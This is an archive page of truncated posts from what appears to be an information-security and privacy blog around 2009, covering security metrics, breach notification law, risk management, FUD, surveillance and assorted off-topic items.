Via Gary Leff, we learn that “The TSA Puts Their Sensitive Security Screening Procedures Online For All To See (oops).” It’s another “we blacked out the doc without blacking out the data” story. The doc is 93 pages, and I don’t have time to more than skim it right now. I think that the redactions […]

 

All in the Presentation

America’s Finest News Source teaches an excellent lesson on how to spin data: Labor Dept: Available Labor Rate Increases To 10.2% WASHINGTON—In what is being touted by the Labor Department as extremely positive news, the nation’s available labor rate has reached double digits for the first time in 26 years, bringing the total number of […]

 

Engineers vs. Scammers

Adam recently sent me a link to a paper titled, “Understanding scam victims: seven principles for systems security.”  The paper examines a number of real-world (i.e. face-to-face) frauds and then extrapolates security principles which can be applied generically to both face-to-face and information or IT security problems. By illustrating these principles with examples taken from […]

 

A sociologist reads a Twitter feed

So, Adam retweets a hysterical reference to a viral email about an absolute genius of a Xmas light display made to look like an accident with a ladder, and the hapless homeowner left hanging from the gutter of his house. The email explains that the display was taken down after two days in large part […]

 
 
 

Fingerprinted and Facebooked at the Border

According to the Wall St Journal, “Iranian Crackdown Goes Global,” Iran is monitoring Facebook, and in a move reminiscent of the Soviets, arresting people whose relatives criticize the regime online. That trend is part of a disturbing tendency to criminalize thoughts, intents, and violations of social norms, those things which are bad because they […]

 

Dilbert On Reusable Code

A while back I wrote an article on reusable code for ThreatPost. Today’s Dilbert has an alternate, equally useful take on reusable code.

 

The stupidest post of the year?

George Hulme nominates this as the stupidest blog post of the year. I’m tempted to vote, although we have 30 more days. Business leaders need to understand there is no more need for proper security to justify itself over and over again. It saves you time and money (period). My take? Anytime someone says that […]

 

Miscommunicating risks to teenagers

A lesson in miscommunication of risk from “abstinence only” sex education aimed at teenagers. The educators emphasize the failure rate of condoms, but never mention the failure rate of abstinence-only policies when implemented by teenagers.

 

We've made piracy a community activity.

From BoingBoing: Somali nautical pirates have established a stock-market where guns and cash are invested in upcoming hijackings, with shares of the proceeds returned to investors. Emergent Chaos strikes again…

 

The Market for Fake Police Badges

But in New York, a city that has become almost synonymous with high security, where office employees wear picture IDs and surveillance cameras are on the rise, some officers don’t wear their badges on patrol. Instead, they wear fakes. Called “dupes,” these phony badges are often just a trifle smaller than real ones but otherwise […]

 

Awesome Vendor-Speak

I received an unsolicited (I’ve tried to unsubscribe several times there, techtarget) email today, that I actually happened to open because it advertised an “integrated maturity model for governance and security”.  Yeah, I’m a sucker like that.  This is what I read: …a practical maturity model with illustrative use cases that can be […]

 

Chris Soghoian’s Surveillance Metrics

I also posted about this on Emergent Chaos, but since our readership doesn’t fully overlap, I’m commenting on it here as well. Chris Soghoian has just posted some of his new research into government electronic surveillance here in the US. The numbers are truly astounding (Sprint for instance provided geo-location data on customers eight million […]

 
 

Visualization Monday: Storage

This is cool.  Visualization of relative storage capacities in terms of media and format. Notice that it goes all the way back into pre-digital forms, a subtle tweak that I’ll bet a lot of people miss on first inspection.  Too bad, too, since the ability to seamlessly compare seemingly-different things is a valuable skill when […]

 

2010 Security Prognosticators – Put Your Money Where Your Mouth Is!!!

Just saw where Symantec has released their 2010 Security Trends to watch.  Now not to pick on Symantec (I’m guilty of the same mess in the past myself over on my old blog) but usually these sorts of prognostication lists are full of the same horse@!@#$.  For example: 8.  Mac and Mobile Malware Will Increase […]

 

FBI Gets all New School

“Of the thousands of cases that we’ve investigated, the public knows about a handful,” said Shawn Henry, assistant director for the Federal Bureau of Investigation’s Cyber Division. “There are million-dollar cases that nobody knows about.” … “Keeping your head in the sand on filing a report means that the bad guys are out there hitting […]

 

Tifatul Sembiring Causes Disasters

The BBC reports that “Indonesia minister says immorality causes disasters:” A government minister has blamed Indonesia’s recent string of natural disasters on people’s immorality. Communication and Information Minister Tifatul Sembiring said that there were many television programmes that destroyed morals. Therefore, the minister said, natural disasters would continue to occur. His comments came as he […]

 
 

For Those Not In The US (or even if you are)

I’d like to wish US readers a happy Thanksgiving. For those outside of the US, I thought this would be a nice little post for today: A pointer to an article in the Financial Times, “Baseball’s love of statistics is taking over football” Those who indulge my passion for analysis and for sport know that […]

 

An advance in the "balance" between security and privacy

Today on Thanksgiving, I’m thankful that the European Parliament has adopted what may be the first useful statement about the balance between security and privacy since Franklin: “… stresses that the EU is rooted in the principle of freedom. Security, in support of freedom, must be pursued through the rule of law and subject to […]

 

Less Is More

Great post today over on SecureThinking about a customer who used a very limited signature set for their IDS. Truth of the matter was that our customer knew exactly what he was doing. He only wanted to see a handful of signatures that were generic and could indicate that “something” was amiss that REALLY needed […]

 

Deny thy father and refuse thy gene sequence?

There’s a fascinating article in the NYTimes magazine, “Who Knew I Was Not the Father?” It’s all about the impact of cheap paternity testing on conceptions of fatherhood. Men now have a cheap and easy way of discovering that children they thought were theirs really carry someone else’s genes. This raises the question, what is fatherhood? […]

 

Jail Time For ID Fraud

This past Friday, Baltimore resident, Michelle Courtney Johnson, was sentenced to 18 months in jail and a $200K fine for theft and use of PHI. According to her plea agreement and court documents, from August 2005 to April 2007, Johnson provided a conspirator with names, Social Security numbers and other identifying information of more than […]

 
 

Connecticut Attorney General On The March

It’s been a bad couple of weeks for residents of Connecticut and their personal health information. First Blue Cross Blue Shield had a laptop stolen with enough PHI that over 800K doctors were notified that their patients were at risk, including almost 19K in Connecticut. Connecticut’s attorney general said Monday that he’s investigating insurer Blue […]

 

Hackers treated as credible sources of information (D'oh!)

Contrary to popular belief, hackers are not credible sources of information that they themselves have stolen and leaked. Maybe they weren’t “hackers” at all. News organizations and bloggers should think more critically and do more investigation before they add to the “echo chamber effect” for such reports.

 

Poker Faced?

In “An Unstoppable Force Meets…” Haseeb writes about “we have just witnessed a monumental event in the history of online poker – the entrance of Isildur into our world of online poker.” Huh? Really? The post is jargon packed, and I’m not a poker player, but apparently this Isildur character has slaughtered all the best […]

 
 

Rational Ignorance: The Users' view of security

Cormac Herley at Microsoft Research has done us all a favor and released a paper So Long, And No Thanks for the Externalities:  The Rational Rejection of Security Advice by Users which opens its abstract with: It is often suggested that users are hopelessly lazy and unmotivated on security questions. They chose weak passwords, ignore […]

 

UK Confused About Piracy

According to BoingBoing, “Leaked UK government plan to create “Pirate Finder General” with power to appoint militias, create laws:” What that means is that an unelected official would have the power to do anything without Parliamentary oversight or debate, provided it was done in the name of protecting copyright. Mandelson elaborates on this, giving three […]

 

"80 Percent of Cyber Attacks Preventable"

Threatlevel (aka 27B/6) reported yesterday that Richard Schaeffer, the NSA’s information assurance director, testified to the Senate Judiciary Subcommittee on Terrorism, Technology and Homeland Security on the issue of computer-based attacks. If network administrators simply instituted proper configuration policies and conducted good network monitoring, about 80 percent of commonly known cyber attacks could […]

 

Questions about Schaeffer's 80% improvement

According to Kim Zetter at Wired, in Senate testimony, Richard Schaeffer, the information assurance director at NSA, claimed that “If network administrators simply instituted proper configuration policies and conducted good network monitoring, about 80 percent of commonly known cyber attacks could be prevented.” I’m trying to find if that’s the FDCC (Federal Desktop Core Configuration), […]

 

FTC Delays Red Flags Enforcement Yet Again

I missed this when it hit the newswires two weeks ago, but the FTC has delayed enforcement of the Red Flags Rule. This change was in response to the American Bar Association successfully suing the FTC and being granted an injunction to prevent the Red Flags Rule being applied to lawyers. Similarly, the American Institute […]

 

ICSA Labs report

In the book, Andrew and I wrote about trading data for credibility. If Verizon’s enthusiasm for sharing their learning is any indication, the approach seems to be paying off in spades. At the Verizon Business blog, Wade Baker writes: Today ICSA Labs (an independent division of Verizon Business) released a report based on testing results […]

 

Can't tell the players without a program

You can’t tell the good guys from the bad guys without knowing the color of their hat. I wish there were some sort of map of the Black Hat ecosystem because it’s hard for non-specialists to tell. Case in point: Virscan.org. Looks like a nice, simple service that scans uploaded files using multiple AV products with the latest signatures. But it seems *much* more useful to bad guys (malware writers and distributors) than to good guys. Who does it serve?

 

In the Proudest Traditions of the Royal Navy

The Royal Fleet Auxiliary ship Wave Knight watched a yacht be hijacked for fear of harming its passengers. All stand for a rousing round of “Ain’t gonna study war no more.”

 

Rich Mogull's Divine Assumptions

Our friend Rich Mogull has an interesting post up on his blog called “Always Assume“. In it, he offers that “assumption” is part of a normal scenario building process, something that is fairly inescapable when making business decisions. And he offers a simple, pragmatic process for assumptions which is mainly scenario development, justification, and action. […]

 
 

Best Practices in Tax Management

Someone sent me a link to “How to Audit-Proof Your Tax Return: Don’t e-File,” by Paul Caron. In it he quotes a plausible theory that “you are giving the IRS easy electronic access to information it would otherwise have to enter, enabling the agency to examine your return and mine the data more easily than […]

 

CFP: 9th Workshop on the Economics of Information Security (WEIS)

The Workshop on the Economics of Information Security (WEIS) is the leading forum for interdisciplinary scholarship on information security, combining expertise from the fields of economics, social science, business, law, policy and computer science.

 

Practices: Proven vs. Standard?

In comments yesterday, both Kyle Maxwell and Nicko suggested that “standard” is a better adjective than “proven:” I like Kyle’s “standard” practice, since it makes it clear that you are just following the flock for safety by sticking to them. Perhaps we should call them “flocking standard practice” I do think there’s an important difference, […]

 

How to Use the "Think" Best Practice

After I posted the new Best Practice: Think, Dennis Fisher tweeted “Never catch on. Nothing for vendors (or Gartner) to sell.” Which is true, but that’s not the point. The point is to be able to ju-jitsu your best-practice cargo-culter into submission. For example: Cargo-culter: We don’t need a review, this project complied with all […]

 

Quick Thought: Scenario Planning

I spent yesterday in a workshop learning about and practicing scenario planning. It’s a really great tool for planning for (as opposed to predicting) the future. It feels like it’s a great addition to the risk assessment/management process. Check it out.

 

Visual Notetaking

I’m a big fan of the book “Back of the Napkin” which is all about using pictures to help with problem solving. Yesterday, I was introduced to a related concept “visual notetaking” where you use images to support other notes you are taking during a meeting. I’m at a two day workshop and we have […]

 

"As far as I know, effective immediately"

Asked about the timing, the unbriefed propaganda minister mumbled: “As far as I know, effective immediately.” When that was reported on television, the Berliners were off. Baffled border guards who would have shot their “comrades” a week earlier let the crowd through—and a barrier that had divided the world was soon being gleefully dismantled. West […]

 

Mini Metricon 4.5 Call for Participation

[Posting this here to help get the word out – Chris ] Mini MetriCon 4.5 will be a one-day event, Monday, March 1, 2010, in San Francisco, California. Through the cooperation of RSA, the workshop will be held at the University of San Francisco, within walking distance of the Moscone Center, the location of the […]

 
 

2 Proposed Breach Laws move forward

See George Hulme, “National Data Breach Law Steps Closer To Reality ” and Dennis Fisher “http://threatpost.com/en_us/blogs/two-data-breach-notification-bills-advance-senate-110609.” Dennis flags this awe-inspiring exception language: “rendered indecipherable through the use of best practices or methods, such as redaction, access controls, or other such mechanisms, that are widely accepted as an effective industry practice, or an effective industry standard.” […]

 

On smelly goats, unicorns, and FUD

Unicorns (of some sort) are not impossible in principle, only non-existent in recent times. As evidence, I offer Tsintaosaurus spinorhinus, a real dinosaur found in China. Though we may be comfortable with our current “smelly, ugly goat” practices, including the ethically questionable FUD tactic, they only perpetuate the problems and, at worst, are like peeing in the swimming pool.

 

Apologies to Richard Bejtlich

The previous blog post, “Just say ‘no’ to FUD”, described Richard Bejtlich’s post at Tao of Security as “FUD in other clothing”. That was over-reaching. I apologize. There was an element of FUD, but my main objection to Richard’s post was due to other reasons.

 

Mini Metricon 4.5 Call For Participation

Mini MetriCon 4.5 will be a one-day event, Monday, March 1, 2010, in San Francisco, California. Through the cooperation of RSA, the workshop will be held at the University of San Francisco, within walking distance of the Moscone Center, the location of the RSA Conference, to be held during the same week. Mini MetriCon attendees […]

 

"A Call for Evidence-Based Security Tools"

Via Schneier: From the Open Access Journal of Forensic Psychology, by a large group of authors: “A Call for Evidence-Based Security Tools“: Abstract: Since the 2001 attacks on the twin towers, policies on security have changed drastically, bringing about an increased need for tools that allow for the detection of deception. Many of the solutions […]

 

Pay for your own dog food

At Microsoft, there’s a very long history of ‘eating your own dogfood’ or using the latest and greatest daily builds. Although today, people seem to use the term “self-host,” which seems evidence that they don’t do either. Eating your own dogfood gives you a decent idea of when it starts to taste ok, which is […]

 

Thank you!

For the opportunity to do this:

 

Detecting Malice

I just finished reading RSnake’s new book Detecting Malice and I can say without a doubt that it is one of the best technical books I have ever read. Furthermore, I can tell you that it is, without a doubt, the best web security book I have ever had the pleasure to read. Imagine a […]

 

Tabletop Science

Mordaxus emailed some of us and said “I hope this doesn’t mean MG has jumped the shark.” What was he talking about? Apparently, ThinkGeek now has a “Molecular Gastronomy Starter Kit.” For those of you who’ve been hiding in a Cheesecake Factory for the past few years, molecular gastronomy is the art of using science […]

 

Seattle: Pete Holmes for City Attorney

I don’t usually say a lot about local issues, but as readers know, I’m concerned about how arbitrary ID checking is seeping into our society. It turns out my friend Eric Rachner is also concerned about this, and was excited when a Washington “Judge said showing ID to cops not required.” So when Eric was […]

 

Just say 'no' to FUD

“Fear, uncertainty, and doubt” (FUD) is a distortion tactic to manipulate decision-makers. You may think it’s good because it can be successful in getting the outcomes you desire. But it’s unethical. FUD is also anti-data and anti-analysis. Don’t do it. It’s the opposite of what we need.

 

Ooops! and Ooops again!

Those of you who’ve heard me speak about the New School with slides have probably heard me refer to this as an astrolabe: Brett Miller just emailed me and asked (as part of a very nice email) “isn’t that an orrery, not an astrolabe?” It appears that I’m going to have to update my commentary. […]

 

Ross Anderson's Psychology & Security page

Ross Anderson has a new Psychology and Security Resource Page. His abstract: A fascinating dialogue is developing between psychologists and security engineers. At the macro scale, societal overreactions to terrorism are founded on the misperception of risk and uncertainty, which has deep psychological roots. At the micro scale, more and more crimes involve deception; as […]

 

Fordham report on Children's Privacy

Following the No Child Left Behind mandate to improve school quality, there has been a growing trend among state departments of education to establish statewide longitudinal databases of personally identifiable information for all K-12 children within a state in order to track progress and change over time. This trend is accompanied by a movement to […]

 

Bob Blakley Gets Future Shock Dead Wrong

Bob Blakley has a very thought provoking piece, “Gartner Gets Privacy Dead Wrong.” I really, really like a lot of what he has to say about the technical frame versus the social frame. It’s a very useful perspective, and I went back and forth for a while with titles for my post (The runner up […]

 

Is responsible disclosure dead?

Jeremiah Grossman has an article in SC Magazine, “Businesses must realize that full disclosure is dead.” On Twitter, I asked for evidence, and Jeremiah responded “Evidence of what exactly?” I think the key assertion that I take issue with is bolded in the context below: Unquestionably, zero-day vulnerabilities have an increasing real-world value to many […]

 

The Conch Republic

Apparently, in a sovereign-in-cheek move, the Florida Keys have withdrawn from the United States, and declared themselves to be “The Conch Republic.” Their motto is “We seceded where others failed.” Perhaps you haven’t heard of them because they make all the good jokes, making writing about them hard. I heard about them because of […]

 

On the value of 'digital asset value' for security decisions

What good is it to know the economic value of a digital asset for the purposes of making information security decisions? If you can’t make better decisions with this information, then the metric doesn’t have any value. This post discusses alternative uses, especially threshold or sanity checks on security spending. For these purposes, it functions better as a “spotlight” than as a “razor”. Digital Asset Value has other uses, not the least to get InfoSec people to understand Business people and their priorities and vice versa.

 

Something For Soscia, Girardi, & Charlie Manuel

It’s the probabilistic decision making tool for baseball managers. On the iPhone. It’s like a business intelligence application in the palm of your hand 🙂 Basically, it takes the probabilistic models of either Win Expectancy or Run Expectancy (any given action has some probability of contributing a run or a win) and given a situation, […]

 

Prisoners in Iran

There are apparently many people being held without charges by Iranian government. But as far as I know, I’ve only ever met one of them, and so wanted to draw attention to his case: During this entire time, our son has had just two short meetings with us for only a few minutes. Please imagine […]

 

Vista Didn't Fail Because of Security

Bruce Schneier points in his blog to an article in The Telegraph in which Steve Ballmer blames the failure of Vista on security. Every security person around should clear their throat loudly. Security is not what made Vista unpalatable. Many people liked Vista. My tech reporter friends not only adored it, but flat couldn’t understand […]

 

Dear ChoicePoint: Lying like a cheap rug undercuts all that

ChoicePoint was supposed to take steps to protect consumer data. But the FTC alleged that in April 2008 the company switched off an internal electronic monitoring system designed to watch customer accounts for signs of unauthorized or suspicious activity. According to the FTC, that safety system remained inactive for four months, during which time unauthorized […]

 

How to Value Digital Assets (Web Sites, etc.)

If you need to do financial justification or economic analysis for information security, especially risk analysis, then you need to value digital assets to some degree of precision and accuracy. There is no universally applicable and acceptable method. This article presents a method that will assist line-of-business managers to make economically rational decisions consistent with overall enterprise goals and values.

 

RSnakes On A Plane

or why RSnake will never be allowed to play video blackjack or poker at Blackhat ever again. RSnake’s exploits with the game system on a recent flight are a fabulous read. Makes me wonder just how integrated these systems are with the regular flight systems though. Btw, RSnake, I expect a demo as part of […]

 

You've Got To Move It Move It

Josh Corman had an awesome post over on Fudsec on Friday. It’s so awesomely appropriate to this blog that I’m sharing it with you. My only complaint is that I wish that I had written it instead. Go read it right now.

 

Toyota Stalks Woman, Claims She Consented

In a lawsuit filed Sept. 28 in Los Angeles Superior Court, Amber Duick claims she had difficulty eating, sleeping and going to work during March and April of last year after she received e-mails for five days from a fictitious man called Sebastian Bowler, from England, who said he was on the run from the […]

 

Another good metaphor, killed by science

Wired has a First Look: Dyson’s Blade-Free Wonder Fan Blows Our Minds: Future generations will have no idea why the shit hitting the fan is any worse than it hitting anything else.

 

Speaking in Michigan on Tuesday

Andrew Stewart and I will be speaking at the University of Michigan SUMIT_09 on Tuesday. We’re on 10:30-11:25. If you’re in the area, please come by.

 

Are Security "Best Practices" Unethical?

Anton Chuvakin’s been going old school. Raising the specter of “risk-less” security via best practices and haunting me like the ghost of blog posts past. Now my position around best practices in the past has been that they are, to use Jack Jones’ phrase, Infosec “shamanism”. We do these things because our forefathers do them, […]

 

SECTOR Sniffing: It Smells, as does the Response

Apparently, at the SecTor security conference, someone tapped into the network and posted passwords to a Wall of Sheep. At the SecTor speakers dinner, several attendees were approached by colleagues and informed that their credentials appeared on the “Wall of Shame” for all to see. When questioned about how the encrypted and unencrypted traffic was […]

 

New Best Practice: Think

Since anyone can declare anything a best practice in information security, I’d like to add my favorite to your list. Think. Thank you.

 

Another Long Time Fugitive Arrested

Yesterday, Luis Armando Peña Soltren was arrested after forty years on the run for hijacking a plane to Cuba. Soltren “will finally face the American justice system that he has been evading for more than four decades,” said U.S. Attorney Preet Bharara. I understand that Woody Allen, Martin Scorsese and David Lynch are already circulating a […]

 

The Presentation of Self and Everyday Photographs

With the kind help of our awesome readership, Amazon and Glazer’s, I’ve acquired a camera, some books, a tripod, a prime 50mm, a flash diffuser, a polarizing filter, a graduated neutral filter, and some other random photography toys tools. You might question this, but I can quit anytime. Really! I even offered to loan my […]

 

Visual Complexity Web Site

VisualComplexity.com intends to be a unified resource space for anyone interested in the visualization of complex networks. While it may not contain any examples specific to information security, there may be some methods and ideas that can be adapted to InfoSec.

 
 

LCROSS Lunar Impact Friday, 4:30 AM Pacific

So the Lunar Crater Observation and Sensing Satellite has one last sensing task which it will carry out tomorrow morning at 4:30 AM Pacific. That is to dig a big hole in Cabeus (proper) and see if there’s water there. Unfortunately for LCROSS, it doesn’t really have landing jets, which means it will dig a […]

 

Hal Finney's news

Hal Finney has posted some news to LessWrong: A man goes in to see his doctor, and after some tests, the doctor says, “I’m sorry, but you have a fatal disease.” Man: “That’s terrible! How long have I got?” Doctor: “Ten.” Man: “Ten? What kind of answer is that? Ten months? Ten years? Ten what?” […]

 

Tetraktys is the Best Cryptographic Novel Ever

I’ve been remiss in not posting a review of Tetraktys, by Ari Juels. Short review: It’s better written and has better cryptographers than the ones in any Dan Brown novel, but that’s really damning it with faint praise, which it doesn’t deserve. It’s a highly readable first novel by Ari Juels, who is Chief Scientist […]

 

Quick Thoughts on the New Blogging Regulations

I want to congratulate the folks at the FTC, who’ve decided we all need to follow some rules about what bloggers can say. See for example, “ Epicenter The Business of Tech FTC Tells Amateur Bloggers to Disclose Freebies or Be Fined” at Wired. These new rules are documented in an easy to read 81 […]

 

The Cost of a Near-Miss Data Breach

Near misses are very valuable signals regarding future losses. If we ignore them in our cost metrics, we might make some very poor decisions. This example shows that there is a qualitative difference between “ground truth data” (in this case, historical cash flow for data breach events) and overall security metrics, which need to reflect our estimates about the future, a.k.a. risk.

 

Botnet Research

Rob Lemos has a new article up on the MIT Technology Review, about some researchers from UC Santa Barbara who spent several months studying the Mebroot Botnet. They found some fascinating stuff and I’m looking forward to reading the paper when it’s finally published. While the vast majority of infected machines were Windows based (64% […]

 

Punditry: Better Security Through Diversity Of Thinking

I am honored that the kind folks at threatpost have asked me to write for them occasionally. My first post is about better security through diversity of thinking, which was inspired by pastry chef Shuna Fish Lydon. From her post (which I quoted in mine as well): It is my experience that unless you push […]

 

Changing Expectations around Breach Notice

Earlier this month, the Department of Health and Human Services imposed a “risk of harm” standard on health care providers who lose control of your medical records. See, for example, “Health IT Data Breaches: No Harm, No Foul:” According to HHS’ harm standard, the question is whether access, use or disclosure of the data poses […]

 

MA/NY: Using GPS To Track Cars Requires A Warrant

Jennifer Granick reports that in Massachusetts, Cops Can’t Convert Car Into Tracking Device Without Court’s OK. Connolly decided that the installation of the GPS device was a seizure of the suspect’s vehicle. “When an electronic surveillance device is installed in a motor vehicle, be it a beeper, radio transmitter, or GPS device, the government’s control […]

 
 

Some thoughts on the Olympics, Chicago and Obama

So the 2016 Olympics will be in Rio de Janeiro. Some people think this was a loss for Obama, but Obama was in a no-win situation. His ability to devote time to trying to influence the Olympics is strongly curtailed by other, more appropriate priorities. If he hadn’t gone to Copenhagen, he would have been […]

 

Models are Distracting

So Dave Mortman wrote: I don’t disagree with Adam that we need raw data. He’s absolutely right that without it, you can’t test models. What I was trying to get at was that, even though I would absolutely love to have access to more raw data to test my own theories, it just isn’t realistic […]

 

Security is About Outcomes, FISMA edition

Over at the US Government IT Dashboard blog, Vivek Kundra (Federal CIO), Robert Carey (Navy CIO) and Vance Hitch (DOJ CIO) write: the evolving challenges we now face, Federal Information Security Management Act (FISMA) metrics need to be rationalized to focus on outcomes over compliance. Doing so will enable new and actionable insight into agencies’ […]

 

Meta-Data?

So awhile back, I posted the following to twitter: Thought of the Day: We don’t need to share raw data if we can share meta-data generated using uniform analytical methodologies. Adam, disagreed: @mortman You can’t test & refine models without raw data, & you can’t ask people with the same orientation to bring diverse perspectives. […]

 

Gates Was Hardly An Exception

There was a lot of news when Henry Lewis Gates was arrested back in July, essentially for mouthing off to a cop. What happened was a shame, but what is more of a shame is that this sort of thing isn’t that rare. Time magazine had a recent article about this, Do You Have the […]

 

Happy Banned Books Week!

Quoting Michael Zimmer: [Yesterday was] the start of Banned Books Week 2009, the 28th annual celebration of the freedom to choose what we read, as well as the freedom to select from a full array of possibilities. Hundreds of books are challenged in schools and libraries in the United States each year. Here’s a great […]

 

Podcasts with Amrit

I had fun recording Beyond the Perimeter Episodes 48 and 49 with Amrit. I think Amrit asked some of the broadest, most complex questions I’ve been asked, and it was hard to keep the episodes short. Go have a listen!

 
 

A Little Temporary Safety

So I saw this ad on the back of the Economist. (Click for a larger PDF). In reading it, I noticed this exhortation to “support the STANDUP act of 2009:” The STANDUP Act* (H.R. 1895) creates a National Graduated Driver Licensing (GDL) law that [limits nighttime driving, reduces in-car distractions, puts a cap on the […]

 
 

Metrics Abused

Statistically speaking, 6 out of 7 dwarves are not happy. [via zem42]

 

National Cyber Leap Year Summit reports now available

I believe these are the final deliverables: National Cyber Leap Year Summit 2009 Co-Chairs Report — main discussion of metrics is p 26-28 National Cyber Leap Year Summit 2009 Participants’ Ideas Report – main discussion of metrics is p 44-46, p 50-51, and p 106; with related discussion on p 53-54. Also worth noting is […]

 

Happy Emancipation Proclamation Day!

That on the first day of January in the year of our Lord, one thousand eight hundred and sixty-three, all persons held as slaves within any state, or designated part of a state, the people whereof thenceforward, and forever free; and the executive government of the United States [including the military and naval authority thereof] […]

 

Making Sense of the SANS "Top Cyber Security Risks" Report

The SANS Top Cyber Security Risks report has received a lot of positive publicity. I applaud the effort and goals of the study and it may have some useful conclusions. We should have more of this. Unfortunately, the report has some major problems. The main conclusions may be valid but the supporting analysis is either confusing or weak. It would also be good if this study could be extended by adding data from other vendors and service providers.

 

Private Thoughts on Race

So I’m sitting on the plane home from* Seattle, and I had a really interesting conversation on race with the woman next to me. We were talking, and she asked me, why is it so hard to have conversations like this. I thought that the answer we came to was interesting, and insofar as it […]

 

Visualization Friday – Improving a Bad Graphic

We can learn from bad visualization examples by correcting them. This example is from the newly released SANS “Top Cyber Security Risks” report. Their first graphic has a simple message, but due to various misleading visual cues, it’s confusing. A simplified graphic works much better, but they probably don’t need a graphic at all — a bulleted list works just as well. Moral of this story: don’t simply hand your graphics to a designer with the instructions to “make this pretty”. Yes, the resulting graphic may be pretty, but it may lose its essential meaning or it might just be more confusing than enlightening. Someone has to take responsibility for picking the right visualization metaphor and structures.

 

Secret Photo Apps for the iPhone

If you try searching the App store for photo apps, you find all sorts of things to make your photos sepia. Or blurry. Or to draw on them. Which is great, but if you want apps to help you take photographs, they’re sorta hard to find. So here are some links: First up, a reference […]

 

Proskauer Rose Crows "Rows of Fallen Foes!"

Over on their blog, the law firm announces yet another class action suit over a breach letter has been dismissed. Unfortunately, that firm is doing a fine business in getting rid of such suits. I say it’s unfortunate for two reasons: first, the sued business has to lay out a lot of money (not as […]

 

Notes to the Data People

Over on his Guerilla CISO blog, Rybolov suggests that we ask the Data.gov folks for infosec data using their Suggest a data set page. It sounds like a good idea to me! I took his request and built on it. Rather than breaking the flow with quotes and edit marks, I’ll simply say the requests […]

 

Atoms, Photographed

The pictures, soon to be published in the journal Physical Review B, show the detailed images of a single carbon atom’s electron cloud, taken by Ukrainian researchers at the Kharkov Institute for Physics and Technology in Kharkov, Ukraine….To create these images, the researchers used a field-emission electron microscope, or FEEM. They placed a rigid chain […]

 

12 Tips for Designing an InfoSec Risk Scorecard (its harder than it looks)

An “InfoSec risk scorecard” attempts to include all the factors that drive information security risk – threats, vulnerabilities, controls, mitigations, assets, etc. But for the sake of simplicity, InfoSec risk scorecards don’t include any probabilistic models, causal models, or the like. A scorecard can only roughly approximate risk under simplifying assumptions. This leaves the designer open to all sorts of problems. Here are 12 tips that can help you navigate these difficulties. It’s harder than it looks.

 

BBC Video of Liquid Explosives

The BBC has some really scary video “Detonation of Liquid Explosives.” However, as I thought about it, I grow increasingly confused by what it purports to show, and the implications. At the end of the day, I think there are two possibilities: It’s a fair representation, or it’s not. I’m leaning slightly towards the second. […]

 

This Friday is “Take an Academic Friend to Work Day”

We need more cross-disciplinary research and collaboration in InfoSec. We start on a small scale, starting with people in our professional network. One fertile area of research and collaboration is to apply the latest research in non-standard logic and formal reasoning (a.k.a. AI) to InfoSec risk management problems. The problem is that most of that research reads like Sanskrit unless you are a specialist. Rather than simply post links to academic papers and ask you to read them, let’s use these papers as a vehicle to start a dialog with an academic friend, or a friend-of-friends. Maybe there are some breakthrough ideas in here. Maybe not. Either way, you will have an interesting experience in cross-discipline collaboration on a small scale.

 

Is risk management too complicated and subtle for InfoSec?

Luther Martin, blogger with Voltage Security, has advised caution about using risk management methods for information security, saying it’s “too complicated and subtle” and may lead decision-makers astray. To back up his point, he uses the example of the Two Envelopes Problem in Bayesian (subjectivist) probability, which can lead to paradoxes. Then he posed an analogous problem in information security, with the claim that probabilistic analysis would show that new security investments are unjustified. However, Luther made some mistakes in formulating the InfoSec problem and thus the lessons from the Two Envelopes Problem don’t apply. Either way, a reframing into a “possible worlds” analysis resolves the paradoxes and accurately evaluates the decision alternatives for both problems. Conclusion: risk management for InfoSec is complicated and subtle, but that only means it should be done with care and with the appropriate tools, methods, and frameworks. Unsolved research problems remain, but the Two Envelopes Problem and similar are not among them.

 

Caster Semenya, Alan Turing and "ID Management" products

South African runner Caster Semenya won the women’s 800-meter, and the attention raised questions about her gender. Most of us tend to think of gender as pretty simple. You’re male or you’re female, and that’s all there is to it. The issue is black and white, if you’ll excuse the irony. There are reports that: […]

 

National Cyber Leap Year: Without a Good Running Start, There Might Be No Leap

The National Cyber Leap Year (NCLY) report coming out in a few weeks might lead to more US government research funding for security metrics in coming years. But that depends on whether the report is compelling to the Feds and Congress. Given the flawed process leading up to the Summit, I have my doubts. Clearly, this NCLY process is not a good model for public-private collaboration going forward.

 

Rebuilding the internet?

Once upon a time, I was uunet!harvard!bwnmr4!adam. Oh, harvard was probably enough, it was a pretty well known host in the uucp network which carried our email before snmp. I was also harvard!bwnmr4!postmaster which meant that at the end of an era, I moved the lab from copied hosts files to dns, when I became […]

 

Metrics: 50% Chance of Injury by Biscuit

The Telegraph reports: More than half of all Britons have been injured by biscuits ranging from scalding from hot tea or coffee while dunking or breaking a tooth eating during a morning tea break, a survey has revealed. Who knew that cookies could be so dangerous? So forget worrying about AV or even seat belts, […]

 

Some Stuff You Might Find Interesting 9-8-2009

IT’S A TAB DUMP Hey, because of the holiday, I missed posting some stuff for you all about security & visualization last week. So I thought I’d make it up to you today (plus, I’m about to declare Firefox tab bankruptcy, as I tend to find things to mention on the blog here and then […]

 

Make the Smart Choice: Ignore This Label

He said the criteria used by the Smart Choices™ Program™ were seriously flawed, allowing less healthy products, like sweet cereals and heavily salted packaged meals, to win its seal of approval. “It’s a blatant failure of this system and it makes it, I’m afraid, not credible,” Mr. Willett said. […] Eileen T. Kennedy, president of […]

 

Only an idea after a bunch of calculating

Andrew Koppelman has a post on lawprof blog Balkinization, titled “You have no idea:” This data sits uneasily beside a recent study in the American Journal of Medicine of personal bankruptcies in the United States. In 2007, 62% of all personal bankruptcies were driven by medical costs. “Nationally, a quarter of firms cancel coverage immediately […]

 

Non Commercial

If you haven’t listened to Larry Lessig’s 23C3 talk, it’s worthwhile to listen to the argument he makes. As I was listening to it, I was struck by the term non-commercial, and, having given it some thought, think that we need a better word to describe the goals Creative Commons is pursuing. The term non-commercial […]

 

We're all reputable on this bus

There’s an interesting story at Computerworld, “Court allows suit against bank for lax security.” What jumped out at me was Citizens also had claimed that its online banking services were being provided and protected by a highly reputable company. In addition to the third-party security services, Citizens said it had its own measures for protecting […]

 

Ten Years Ago: Reminiscing about Zero-Knowledge

Ten years ago, I left Boston to go work at an exciting startup called Zero-Knowledge Systems. Zero-Knowledge was all about putting the consumer in control of their privacy. Even looking back, I have no regrets. I’m proud of what I was working towards during the internet bubble, and I know a lot of people who […]

 

Sunday Linkage Security/Privacy In The UK

